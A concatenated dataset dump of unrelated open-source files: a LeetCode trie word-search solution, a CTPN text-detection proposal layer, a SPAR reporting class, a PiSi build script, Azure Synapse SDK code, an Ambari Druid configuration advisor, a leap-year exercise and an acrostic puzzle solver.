给定一个 m x n 二维字符网格 board 和一个单词(字符串)列表 words,找出所有同时在二维网格和字典中出现的单词。
单词必须按照字母顺序,通过 相邻的单元格 内的字母构成,其中“相邻”单元格是那些水平相邻或垂直相邻的单元格。同一个单元格内的字母在一个单词中不允许被重复使用。
作者:力扣 (LeetCode)
链接:https://leetcode-cn.com/leetbook/read/trie/x7hd9g/
来源:力扣(LeetCode)
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
"""
from collections import defaultdict
class TrieTree(object):
def __init__(self):
self.children = defaultdict(TrieTree)
self.is_word = ''
class Solution:
def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:
"""
使用前缀树+深度优先搜索
:param board:
:param words:
:return:
"""
root = TrieTree()
n = len(board)
m = len(board[0])
for word in words:
cur_node = root
for s in word:
cur_node = cur_node.children[s]
cur_node.is_word = word
def dfs(i, j, node):
latter = board[i][j]
if latter not in node.children:
return
if node.children[latter].is_word:
result.append(node.children[latter].is_word)
# 这个单词已经找到过了
node.children[latter].is_word = ''
# 标记防止重复
board[i][j] = '#'
for tem_i, tem_j in ((-1, 0), (1, 0), (0, -1), (0, 1)):
index_i = tem_i + i
index_j = tem_j + j
if 0 <= index_i < n and 0 <= index_j < m and board[index_i][index_j] in node.children[latter].children:
dfs(index_i, index_j, node.children[latter])
board[i][j] = latter
result = []
for i in range(n):
for j in range(m):
dfs(i, j, root)
return result
if __name__ == '__main__':
print(Solution().findWords(
board=[["o", "a", "a", "n"], ["e", "t", "a", "e"], ["i", "h", "k", "r"], ["i", "f", "l", "v"]],
words=["oath", "pea", "eat", "rain"]))
| [
"[email protected]"
] | |
b8cb1da9859a8b7d3e73511d1f3d1e79c33b94ba | b987d02490ab85b51f95d04a18731c1718b740fd | /ctpn_new/network/anchorlayer/proposal_target_tf.py | 5849421c836ecb9440008a3b4f7f6fcae493d893 | [] | no_license | lzd0825/text_detection_main | 2948a4600ea9d1109ba7d1ddb163b634531f91a2 | e2b5defd44fd31135be1bf8f7129d0e656d4a2ac | refs/heads/master | 2020-03-27T20:22:09.179680 | 2018-04-03T12:10:20 | 2018-04-03T12:10:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,657 | py | from .generate_anchors import generate_anchors
from lib import load_config
import numpy as np
from .anchor_nms_pf import anchor_nms
cfg = load_config()
def proposal_layer(rpn_cls_prob_reshape, rpn_bbox_pred, im_info, _feat_stride=(16,)):
"""
'rpn_cls_prob_reshape': softmax以后的概率值,形状为(1, H, W, Ax2)
'rpn_bbox_pred': 回归,即y和高度,形状是[1, H, W, 20],
'im_info': 图片信息,一个三维向量,包含高,宽,缩放比例
cfg_key: 字符串, "TEST"
_feat_stride = [16,]
anchor_scales = [16,]
cfg_key = 'TEST'
Returns
----------
rpn_rois : (1 x H x W x A, 5) e.g. [0, x1, y1, x2, y2]
"""
_anchors = generate_anchors() # 生成基本的10个anchor
_num_anchors = _anchors.shape[0] # 10个anchor
assert rpn_cls_prob_reshape.shape[0] == 1, \
'Only single item batches are supported'
nms_thresh = cfg.TEST.RPN_NMS_THRESH # nms用参数,阈值是0.7
min_size = cfg.TEST.RPN_MIN_SIZE # 候选box的最小尺寸,目前是16,高宽均要大于16
positive_thresh = cfg.TEST.LINE_MIN_SCORE # 大于这个分数阈值的判为正例
# TODO 后期需要修改这个最小尺寸,改为8?
height, width = rpn_cls_prob_reshape.shape[1:3] # feature-map的高宽
# 取出前景的得分,不去关心 背景的得分
# (1, H, W, A) 这里取出的全部是前景的得分
scores = np.reshape(np.reshape(rpn_cls_prob_reshape, [1, height, width, _num_anchors, 2])[:, :, :, :, 1],
[1, height, width, _num_anchors])
# 模型所输出的盒子回归
bbox_deltas = rpn_bbox_pred # 模型输出的pred是相对值,需要进一步处理成真实图像中的坐标
# Enumerate all shifts
# 同anchor-target-layer-tf这个文件一样,生成anchor的shift,进一步得到整张图像上的所有anchor
shift_x = np.arange(0, width) * _feat_stride
shift_y = np.arange(0, height) * _feat_stride
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
shifts = np.vstack((shift_x.ravel(), shift_y.ravel(),
shift_x.ravel(), shift_y.ravel())).transpose()
A = _num_anchors
K = shifts.shape[0] # feature-map的像素个数
anchors = _anchors.reshape((1, A, 4)) + shifts.reshape((1, K, 4)).transpose((1, 0, 2))
bbox_deltas = bbox_deltas.reshape((-1, 2)) # (HxWxA, 2) 模型所输出的盒子回归值
anchors = anchors.reshape((K * A, 4)) # 这里得到的anchor就是整张图像上的所有anchor
proposals = bbox_transform_inv(anchors, bbox_deltas) # 做逆变换,得到box在图像上的真实坐标
proposals = proposals.reshape((K, 4*A))
scores = scores.reshape((K, A))
# 非极大值抑制,以列表形式输出进行列非极大值抑制后的文本片段以及相应的分数
proposals, scores = anchor_nms(height, width, proposals, scores, nms_thresh, positive_thresh)
proposals = np.array(proposals).reshape((-1, 4))
scores = np.array(scores).reshape((-1, 1))
# 对盒子进行裁剪,以保证不会超出图片边框
proposals = clip_boxes(proposals, im_info[:2]) # 将所有的proposal修建一下,超出图像范围的将会被修剪掉
# 移除那些proposal小于一定尺寸的proposal
keep = _filter_boxes(proposals, min_size * im_info[2])
proposals = proposals[keep, :] # 保留剩下的proposal
scores = scores[keep]
# score按得分的高低进行排序,返回脚标
order = scores.ravel().argsort()[::-1]
proposals = proposals[order, :]
scores = scores[order]
blob = np.hstack((scores.astype(np.float32, copy=False), proposals.astype(np.float32, copy=False)))
# blob返回一個多行5列矩陣,第一行爲分數,後四行爲盒子坐標
# bbox_deltas爲多行两列矩陣,每行爲一個回歸值
return blob
def bbox_transform_inv(boxes, deltas):
"""
:param boxes: shape是(H×W×10,4)每一行爲一個anchor的真實坐標
:param deltas: (H×W×10,2)每行对应y个高度的回归
:return:
"""
# y的回归 = (GT的y - anchor的y) / anchor的高
# 高的回归 = log(GT的高 / anchor的高)
boxes = boxes.astype(deltas.dtype, copy=False)
# widths = boxes[:, 2] - boxes[:, 0] + 1.0
heights = boxes[:, 3] - boxes[:, 1] + 1.0
# ctr_x = boxes[:, 0] + 0.5 * widths
ctr_y = boxes[:, 1] + 0.5 * heights
dy = deltas[:, 0]
dh = deltas[:, 1]
pred_ctr_y = dy * heights + ctr_y
pred_h = np.exp(dh) * heights
pred_boxes = np.zeros(boxes.shape, dtype=deltas.dtype)
# x1
pred_boxes[:, 0] = boxes[:, 0]
# y1
pred_boxes[:, 1] = pred_ctr_y - 0.5 * pred_h
# x2
pred_boxes[:, 2] = boxes[:, 2]
# y2
pred_boxes[:, 3] = pred_ctr_y + 0.5 * pred_h
return pred_boxes
def clip_boxes(boxes, im_shape):
"""
:param boxes: [N, 4]分别对应x1,y1,x2,y2
:param im_shape: 二维向量,分别是图片的
:return:
"""
# x1 >= 0
boxes[:, 0] = np.maximum(np.minimum(boxes[:, 0], im_shape[1] - 1), 0)
# y1 >= 0
boxes[:, 1] = np.maximum(np.minimum(boxes[:, 1], im_shape[0] - 1), 0)
# x2 < im_shape[1]
boxes[:, 2] = np.maximum(np.minimum(boxes[:, 2], im_shape[1] - 1), 0)
# y2 < im_shape[0]
boxes[:, 3] = np.maximum(np.minimum(boxes[:, 3], im_shape[0] - 1), 0)
return boxes
def _filter_boxes(boxes, min_size):
"""Remove all boxes with any side smaller than min_size."""
ws = boxes[:, 2] - boxes[:, 0] + 1
hs = boxes[:, 3] - boxes[:, 1] + 1
keep = np.where((ws >= min_size) & (hs >= min_size))[0]
return keep
| [
"[email protected]"
] | |
3a2fc39ab03587a3455433a7490ceb28ba16c6a7 | 373035950bdc8956cc0b74675aea2d1857263129 | /spar_python/report_generation/ta1/ta1_analysis_input.py | 874d943a04b1e044f025d7ffc970b415bbae653f | [
"BSD-2-Clause",
"BSD-3-Clause"
] | permissive | limkokholefork/SPARTA | 5d122cd2e920775d61a5404688aabbafa164f22e | 6eeb28b2dd147088b6e851876b36eeba3e700f16 | refs/heads/master | 2021-11-11T21:09:38.366985 | 2017-06-02T16:21:48 | 2017-06-02T16:21:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,808 | py | # *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: SY
# Description: A analysis input class
#
#
# Modifications:
# Date Name Modification
# ---- ---- ------------
# 11 Sep 2013 SY Original version
# *****************************************************************
# SPAR imports:
import spar_python.report_generation.ta1.ta1_config as config
import spar_python.report_generation.ta1.ta1_schema as t1s
import spar_python.report_generation.ta1.ta1_test_database as t1tdb
class Input(dict):
"""Represents an input object"""
@property
def test_db(self):
"""Gives a test database object with the specified database number of
records and record size"""
return t1tdb.TestDatabase(
db_num_records=self.get(t1s.DBF_NUMRECORDS),
db_record_size=self.get(t1s.DBF_RECORDSIZE),
short_database_names=config.SHORT_DATABASE_NAMES)
def get_constraint_list(self):
"""Returns a constraint list based on the given arguments."""
desired_constraints_list = [
(t1s.DBF_TABLENAME, t1s.DBF_NUMRECORDS),
(t1s.DBF_TABLENAME, t1s.DBF_RECORDSIZE),
(t1s.DBF_TABLENAME, t1s.DBF_CAT),
(t1s.DBF_TABLENAME, t1s.DBF_SUBCAT),
(t1s.DBF_TABLENAME, t1s.DBF_SUBSUBCAT),
(t1s.DBP_TABLENAME, t1s.DBP_SELECTIONCOLS),
(t1s.DBA_TABLENAME, t1s.DBA_FIELD)]
constraint_list = []
for (table, field) in desired_constraints_list:
if self.get(field):
constraint_list.append((table, field, self.get(field)))
return constraint_list
| [
"[email protected]"
] | |
05ac163c99119bb20a966bfb6c4d464daccb8fdf | f48f9798819b12669a8428f1dc0639e589fb1113 | /office/misc/t1utils/actions.py | 4646311793129d513d7af2b63c65c2693fad65e7 | [] | no_license | vdemir/PiSiPackages-pardus-2011-devel | 781aac6caea2af4f9255770e5d9301e499299e28 | 7e1867a7f00ee9033c70cc92dc6700a50025430f | refs/heads/master | 2020-12-30T18:58:18.590419 | 2012-03-12T03:16:34 | 2012-03-12T03:16:34 | 51,609,831 | 1 | 0 | null | 2016-02-12T19:05:41 | 2016-02-12T19:05:40 | null | UTF-8 | Python | false | false | 505 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2006-2009 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure()
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("NEWS", "README")
| [
"[email protected]"
] | |
3252542c883a849ab435d4838cce3bbf887c8247 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/synapse/azure-mgmt-synapse/azure/mgmt/synapse/aio/operations/_library_operations.py | 990d2d64e53b57c638fc900f4358193a5994d38a | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 5,218 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Optional, TypeVar
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._library_operations import build_get_request
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class LibraryOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.synapse.aio.SynapseManagementClient`'s
:attr:`library` attribute.
"""
models = _models
def __init__(self, *args, **kwargs) -> None:
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace_async
async def get(
self, resource_group_name: str, library_name: str, workspace_name: str, **kwargs: Any
) -> _models.LibraryResource:
"""Get library by name.
Get library by name in a workspace.
:param resource_group_name: The name of the resource group. The name is case insensitive.
Required.
:type resource_group_name: str
:param library_name: Library name. Required.
:type library_name: str
:param workspace_name: The name of the workspace. Required.
:type workspace_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: LibraryResource or the result of cls(response)
:rtype: ~azure.mgmt.synapse.models.LibraryResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2021-06-01-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2021-06-01-preview")
)
cls: ClsType[_models.LibraryResource] = kwargs.pop("cls", None)
request = build_get_request(
resource_group_name=resource_group_name,
library_name=library_name,
workspace_name=workspace_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize("LibraryResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Synapse/workspaces/{workspaceName}/libraries/{libraryName}"
}
| [
"[email protected]"
] | |
0fbb596da1c418ea68e5c2e601b52a8c30336826 | 7b221a4981edad73991cf1e357274b46c4054eff | /stacks/XIAOMATECH/1.0/services/DRUID/service_advisor.py | be0c5a7b79a4be724c116623a1208be4f1593daf | [
"Apache-2.0"
] | permissive | aries-demos/dataops | a4e1516ef6205ad1ac5f692822e577e22ee85c70 | 436c6e89a1fdd0593a17815d3ec79c89a26d48f1 | refs/heads/master | 2020-05-29T17:20:12.854005 | 2019-05-22T06:06:00 | 2019-05-22T06:06:00 | 189,270,801 | 2 | 3 | Apache-2.0 | 2019-05-29T17:35:25 | 2019-05-29T17:35:24 | null | UTF-8 | Python | false | false | 17,909 | py | #!/usr/bin/env ambari-python-wrap
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Python imports
import imp
import os
import traceback
import re
import socket
import fnmatch
import json
import inspect
from resource_management.libraries.functions import format
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
STACKS_DIR = os.path.join(SCRIPT_DIR, "../../../../")
PARENT_FILE = os.path.join(STACKS_DIR, "service_advisor.py")
try:
if "BASE_SERVICE_ADVISOR" in os.environ:
PARENT_FILE = os.environ["BASE_SERVICE_ADVISOR"]
with open(PARENT_FILE, "rb") as fp:
service_advisor = imp.load_module("service_advisor", fp, PARENT_FILE,
(".py", "rb", imp.PY_SOURCE))
except Exception as e:
traceback.print_exc()
print "Failed to load parent"
class DruidServiceAdvisor(service_advisor.ServiceAdvisor):
def __init__(self, *args, **kwargs):
self.as_super = super(DruidServiceAdvisor, self)
self.as_super.__init__(*args, **kwargs)
self.initialize_logger("DruidServiceAdvisor")
# Always call these methods
self.modifyMastersWithMultipleInstances()
self.modifyCardinalitiesDict()
self.modifyHeapSizeProperties()
self.modifyNotValuableComponents()
self.modifyComponentsNotPreferableOnServer()
self.modifyComponentLayoutSchemes()
def modifyMastersWithMultipleInstances(self):
"""
Modify the set of masters with multiple instances.
Must be overriden in child class.
"""
# Nothing to do
pass
def modifyCardinalitiesDict(self):
"""
Modify the dictionary of cardinalities.
Must be overriden in child class.
"""
# Nothing to do
pass
def modifyHeapSizeProperties(self):
"""
Modify the dictionary of heap size properties.
Must be overriden in child class.
"""
pass
def modifyNotValuableComponents(self):
"""
Modify the set of components whose host assignment is based on other services.
Must be overriden in child class.
"""
# Nothing to do
pass
def modifyComponentsNotPreferableOnServer(self):
"""
Modify the set of components that are not preferable on the server.
Must be overriden in child class.
"""
# Nothing to do
pass
def modifyComponentLayoutSchemes(self):
"""
Modify layout scheme dictionaries for components.
The scheme dictionary basically maps the number of hosts to
host index where component should exist.
Must be overriden in child class.
"""
pass
def getServiceComponentLayoutValidations(self, services, hosts):
"""
Get a list of errors.
Must be overriden in child class.
"""
return self.getServiceComponentCardinalityValidations(
services, hosts, "DRUID")
def getServiceConfigurationRecommendations(self, configurations,
clusterData, services, hosts):
"""
Entry point.
Must be overriden in child class.
"""
self.logger.info(
"Class: %s, Method: %s. Recommending Service Configurations." %
(self.__class__.__name__, inspect.stack()[0][3]))
recommender = DruidRecommender()
recommender.recommendDruidConfigurationsFromHDP30(
configurations, clusterData, services, hosts)
def getServiceConfigurationsValidationItems(
self, configurations, recommendedDefaults, services, hosts):
"""
Entry point.
Validate configurations for the service. Return a list of errors.
The code for this function should be the same for each Service Advisor.
"""
self.logger.info("Class: %s, Method: %s. Validating Configurations." %
(self.__class__.__name__, inspect.stack()[0][3]))
validator = DruidValidator()
# Calls the methods of the validator using arguments,
# method(siteProperties, siteRecommendations, configurations, services, hosts)
return validator.validateListOfConfigUsingMethod(
configurations, recommendedDefaults, services, hosts,
validator.validators)
class DruidRecommender(service_advisor.ServiceAdvisor):
"""
Druid Recommender suggests properties when adding the service for the first time or modifying configs via the UI.
"""
def __init__(self, *args, **kwargs):
self.as_super = super(DruidRecommender, self)
self.as_super.__init__(*args, **kwargs)
def recommendDruidConfigurationsFromHDP30(self, configurations,
clusterData, services, hosts):
# druid is not in list of services to be installed
if 'druid-common' not in services['configurations']:
return
componentsListList = [
service["components"] for service in services["services"]
]
componentsList = [
item["StackServiceComponents"] for sublist in componentsListList
for item in sublist
]
servicesList = [
service["StackServices"]["service_name"]
for service in services["services"]
]
putCommonProperty = self.putProperty(configurations, "druid-common",
services)
putCommonProperty('druid.zk.service.host',
self.getZKHostPortString(services))
self.recommendDruidMaxMemoryLimitConfigurations(
configurations, clusterData, services, hosts)
# recommending the metadata storage uri
database_name = services['configurations']["druid-common"][
"properties"]["database_name"]
metastore_hostname = services['configurations']["druid-common"][
"properties"]["metastore_hostname"]
database_type = services['configurations']["druid-common"][
"properties"]["druid.metadata.storage.type"]
metadata_storage_port = "1527"
mysql_module_name = "mysql-metadata-storage"
postgres_module_name = "postgresql-metadata-storage"
extensions_load_list = services['configurations']['druid-common'][
'properties']['druid.extensions.loadList']
putDruidCommonProperty = self.putProperty(configurations,
"druid-common", services)
extensions_load_list = self.removeFromList(extensions_load_list,
mysql_module_name)
extensions_load_list = self.removeFromList(extensions_load_list,
postgres_module_name)
if database_type == 'mysql':
metadata_storage_port = "3306"
extensions_load_list = self.addToList(extensions_load_list,
mysql_module_name)
if database_type == 'postgresql':
extensions_load_list = self.addToList(extensions_load_list,
postgres_module_name)
metadata_storage_port = "5432"
putDruidCommonProperty('druid.metadata.storage.connector.port',
metadata_storage_port)
putDruidCommonProperty(
'druid.metadata.storage.connector.connectURI',
self.getMetadataConnectionString(database_type).format(
metastore_hostname, database_name, metadata_storage_port))
# HDFS is installed
if "HDFS" in servicesList and "hdfs-site" in services["configurations"]:
# recommend HDFS as default deep storage
extensions_load_list = self.addToList(extensions_load_list,
"druid-hdfs-storage")
putCommonProperty("druid.storage.type", "hdfs")
putCommonProperty("druid.storage.storageDirectory",
"/druid/storage")
# configure indexer logs configs
putCommonProperty("druid.indexer.logs.type", "hdfs")
putCommonProperty("druid.indexer.logs.directory", "/logs/druid")
if "CONFLUENT" in servicesList:
extensions_load_list = self.addToList(
extensions_load_list, "druid-kafka-indexing-service")
if 'AMBARI_METRICS' in servicesList:
extensions_load_list = self.addToList(extensions_load_list,
"ambari-metrics-emitter")
putCommonProperty('druid.extensions.loadList', extensions_load_list)
# JVM Configs go to env properties
putEnvProperty = self.putProperty(configurations, "druid-env",
services)
# processing thread pool and memory configs
for component in ['DRUID_HISTORICAL', 'DRUID_BROKER']:
component_hosts = self.getHostsWithComponent(
"DRUID", component, services, hosts)
nodeType = self.DRUID_COMPONENT_NODE_TYPE_MAP[component]
putComponentProperty = self.putProperty(configurations,
format("druid-{nodeType}"),
services)
if (component_hosts is not None and len(component_hosts) > 0):
totalAvailableCpu = self.getMinCpu(component_hosts)
processingThreads = 1
if totalAvailableCpu > 1:
processingThreads = totalAvailableCpu - 1
numMergeBuffers = max(2, processingThreads / 4)
putComponentProperty('druid.processing.numThreads',
processingThreads)
putComponentProperty(
'druid.server.http.numThreads',
max(10, (totalAvailableCpu * 17) / 16 + 2) + 30)
putComponentProperty('druid.processing.numMergeBuffers',
numMergeBuffers)
totalAvailableMemInMb = self.getMinMemory(
component_hosts) / 1024
maxAvailableBufferSizeInMb = totalAvailableMemInMb / (
processingThreads + numMergeBuffers)
putComponentProperty(
'druid.processing.buffer.sizeBytes',
self.getDruidProcessingBufferSizeInMb(
maxAvailableBufferSizeInMb) * 1024 * 1024)
# returns the recommended druid processing buffer size in Mb.
# the recommended buffer size is kept lower then the max available memory to have enough free memory to load druid data.
# for low memory nodes, the actual allocated buffer size is small to keep some free memory for memory mapping of segments
# If user installs all druid processes on a single node, memory available for loading segments will be further decreased.
def getDruidProcessingBufferSizeInMb(self, maxAvailableBufferSizeInMb):
if maxAvailableBufferSizeInMb <= 256:
return min(64, maxAvailableBufferSizeInMb)
elif maxAvailableBufferSizeInMb <= 1024:
return 128
elif maxAvailableBufferSizeInMb <= 2048:
return 256
elif maxAvailableBufferSizeInMb <= 6144:
return 512
# High Memory nodes below
else:
return 1024
def getMetadataConnectionString(self, database_type):
driverDict = {
'mysql': 'jdbc:mysql://{0}:{2}/{1}?createDatabaseIfNotExist=true',
'derby': 'jdbc:derby://{0}:{2}/{1};create=true',
'postgresql': 'jdbc:postgresql://{0}:{2}/{1}'
}
return driverDict.get(database_type.lower())
def addToList(self, json_list, word):
desr_list = json.loads(json_list)
if word not in desr_list:
desr_list.append(word)
return json.dumps(desr_list)
def removeFromList(self, json_list, word):
desr_list = json.loads(json_list)
if word in desr_list:
desr_list.remove(word)
return json.dumps(desr_list)
def recommendDruidMaxMemoryLimitConfigurations(
self, configurations, clusterData, services, hosts):
putEnvPropertyAttribute = self.putPropertyAttribute(
configurations, "druid-env")
for component in [
"DRUID_HISTORICAL", "DRUID_MIDDLEMANAGER", "DRUID_BROKER",
"DRUID_OVERLORD", "DRUID_COORDINATOR"
]:
component_hosts = self.getHostsWithComponent(
"DRUID", component, services, hosts)
if component_hosts is not None and len(component_hosts) > 0:
totalAvailableMem = self.getMinMemory(
component_hosts) / 1024 # In MB
nodeType = self.DRUID_COMPONENT_NODE_TYPE_MAP[component]
putEnvPropertyAttribute(
format('druid.{nodeType}.jvm.heap.memory'), 'maximum',
max(totalAvailableMem, 1024))
DRUID_COMPONENT_NODE_TYPE_MAP = {
'DRUID_BROKER': 'broker',
'DRUID_COORDINATOR': 'coordinator',
'DRUID_HISTORICAL': 'historical',
'DRUID_MIDDLEMANAGER': 'middlemanager',
'DRUID_OVERLORD': 'overlord',
'DRUID_ROUTER': 'router'
}
def getMinMemory(self, component_hosts):
min_ram_kb = 1073741824 # 1 TB
for host in component_hosts:
ram_kb = host['Hosts']['total_mem']
min_ram_kb = min(min_ram_kb, ram_kb)
return min_ram_kb
def getMinCpu(self, component_hosts):
min_cpu = 256
for host in component_hosts:
cpu_count = host['Hosts']['cpu_count']
min_cpu = min(min_cpu, cpu_count)
return min_cpu
class DruidValidator(service_advisor.ServiceAdvisor):
"""
Druid Validator checks the correctness of properties whenever the service is first added or the user attempts to
change configs via the UI.
"""
def __init__(self, *args, **kwargs):
self.as_super = super(DruidValidator, self)
self.as_super.__init__(*args, **kwargs)
self.validators = [
("druid-env", self.validateDruidEnvConfigurationsFromHDP30),
("druid-historical",
self.validateDruidHistoricalConfigurationsFromHDP30),
("druid-broker", self.validateDruidBrokerConfigurationsFromHDP30)
]
def validateDruidEnvConfigurationsFromHDP30(
self, properties, recommendedDefaults, configurations, services,
hosts):
validationItems = []
# Minimum Direct memory Validation
envProperties = services['configurations']['druid-env']['properties']
for nodeType in ['broker', 'historical']:
properties = services['configurations'][format(
'druid-{nodeType}')]['properties']
intermediateBufferSize = int(
properties['druid.processing.buffer.sizeBytes']) / (1024 * 1024
) # In MBs
processingThreads = int(properties['druid.processing.numThreads'])
directMemory = int(
envProperties[format('druid.{nodeType}.jvm.direct.memory')])
if directMemory < (processingThreads + 1) * intermediateBufferSize:
validationItems.extend({
"config-name":
format("druid.{nodeType}.jvm.direct.memory"),
"item":
self.getErrorItem(
format(
"Not enough direct memory available for {nodeType} Node."
"Please adjust druid.{nodeType}.jvm.direct.memory, druid.processing.buffer.sizeBytes, druid.processing.numThreads"
))
})
return self.toConfigurationValidationProblems(validationItems,
"druid-env")
def validateDruidHistoricalConfigurationsFromHDP30(
self, properties, recommendedDefaults, configurations, services,
hosts):
validationItems = [{
"config-name":
"druid.processing.numThreads",
"item":
self.validatorEqualsToRecommendedItem(
properties, recommendedDefaults, "druid.processing.numThreads")
}]
return self.toConfigurationValidationProblems(validationItems,
"druid-historical")
def validateDruidBrokerConfigurationsFromHDP30(
self, properties, recommendedDefaults, configurations, services,
hosts):
validationItems = [{
"config-name":
"druid.processing.numThreads",
"item":
self.validatorEqualsToRecommendedItem(
properties, recommendedDefaults, "druid.processing.numThreads")
}]
return self.toConfigurationValidationProblems(validationItems,
"druid-broker")
| [
"[email protected]"
] | |
e000797abae0baf2ef7c3b2faedebcc2cf39dbd4 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_2/jblmuz001/question1.py | 2a078b63ff7024e2ae2a73d45ec3628af59c4b52 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | #Question 1
import math
x=eval(input("Enter a year:\n"))
if(x%400==0 or (x%4==0 and x%100!=0)):
print(x, "is a leap year.")
else:
print(x, "is not a leap year.")
| [
"[email protected]"
] | |
c466266df26b42152c21f2fafa8ea9251a2c1683 | cd014fae6791f51a9a382f34dbdcee6d61d84e30 | /62_From_the_border_of_hell/62.py | 6e0657bcb1f623ade641513504631b8ec63c4cef | [
"Apache-2.0"
] | permissive | ckclark/Hackquest | 1505f50fc2c735db059205d1c9bbba1832cc5059 | 65ed5fd32e79906c0e36175bbd280d976c6134bd | refs/heads/master | 2021-01-16T19:32:29.434790 | 2015-09-29T13:39:04 | 2015-09-29T13:39:04 | 42,388,846 | 13 | 5 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | question = [
'''Toni, I write you this letter tonight with''',
'''ebony pen and ink, to show my deep love''',
'''and to give you my advise. If you pack your bag''',
'''later tonight, do not feel responsible for future''',
'''happenings, as they aren't your fault. Even, if a''',
'''small part inside of you may think like that. All''',
'''alternatives are equally bad. Just make sure sin''',
'''doesn't conquer your life, and, please''',
'''don't have unprotected sex with Mary Ann in the car late at night!''',
]
ans = []
for s in question:
ans.append(s[0])
ans.append(s[-1])
print ''.join(ans)
# The eagle has landed!
| [
"[email protected]"
] | |
